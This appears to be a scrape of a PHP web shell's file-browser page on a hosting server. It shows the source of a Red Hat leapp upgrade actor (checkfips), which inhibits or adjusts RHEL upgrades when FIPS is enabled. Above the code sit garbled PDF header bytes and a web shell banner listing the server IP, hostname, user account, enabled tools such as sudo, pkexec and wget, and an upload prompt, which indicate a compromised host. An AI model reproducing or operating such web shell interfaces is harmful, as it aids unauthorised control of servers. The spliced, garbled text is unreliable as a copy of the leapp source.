%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 188.40.95.74 / Your IP : 216.73.216.142 Web Server : Apache System : Linux cp01.striminghost.net 3.10.0-1160.119.1.el7.tuxcare.els13.x86_64 #1 SMP Fri Nov 22 06:29:45 UTC 2024 x86_64 User : vlasotin ( 1054) PHP Version : 5.6.40 Disable Function : NONE MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/share/leapp-repository/repositories/system_upgrade/common/actors/checkfips/ |
Upload File : |
from leapp import reporting from leapp.actors import Actor from leapp.exceptions import StopActorExecutionError from leapp.libraries.common.config import version from leapp.models import DracutModule, FIPSInfo, Report, UpgradeInitramfsTasks from leapp.tags import ChecksPhaseTag, IPUWorkflowTag class CheckFips(Actor): """ Inhibit upgrade if FIPS is detected as enabled. """ name = 'check_fips' consumes = (FIPSInfo,) produces = (Report, UpgradeInitramfsTasks) tags = (IPUWorkflowTag, ChecksPhaseTag) def process(self): fips_info = next(self.consume(FIPSInfo), None) if not fips_info: raise StopActorExecutionError('Cannot check FIPS state due to not receiving necessary FIPSInfo message', details={'Problem': 'Did not receive a message with information about FIPS ' 'usage'}) if version.get_target_major_version() == '8': if fips_info.is_enabled: title = 'Automated upgrades from RHEL 7 to RHEL 8 in FIPS mode are not supported' summary = ('Leapp has detected that FIPS is enabled on this system. ' 'Automated in-place upgrade of RHEL 7 systems in FIPS mode is currently unsupported ' 'and manual intervention is required.') fips_7to8_steps_docs_url = 'https://red.ht/planning-upgrade-to-rhel8' reporting.create_report([ reporting.Title(title), reporting.Summary(summary), reporting.Severity(reporting.Severity.HIGH), reporting.Groups([reporting.Groups.SECURITY, reporting.Groups.INHIBITOR]), reporting.ExternalLink(url=fips_7to8_steps_docs_url, title='Planning an upgrade from RHEL 7 to RHEL 8') ]) elif version.get_target_major_version() == '9': # FIXME(mhecko): We include these files manually as they are not included automatically when the fips # module is used due to a bug in dracut. This code should be removed, once the dracut bug is resolved. # See https://bugzilla.redhat.com/show_bug.cgi?id=2176560 if fips_info.is_enabled: fips_required_initramfs_files = [ '/etc/crypto-policies/back-ends/opensslcnf.config', '/etc/pki/tls/openssl.cnf', '/usr/lib64/ossl-modules/fips.so', ] self.produce(UpgradeInitramfsTasks(include_files=fips_required_initramfs_files, include_dracut_modules=[DracutModule(name='fips')])) elif version.get_target_major_version() == '10': # TODO(mmatuska): What to do with FIPS on 9to10? OAMG-11431 pass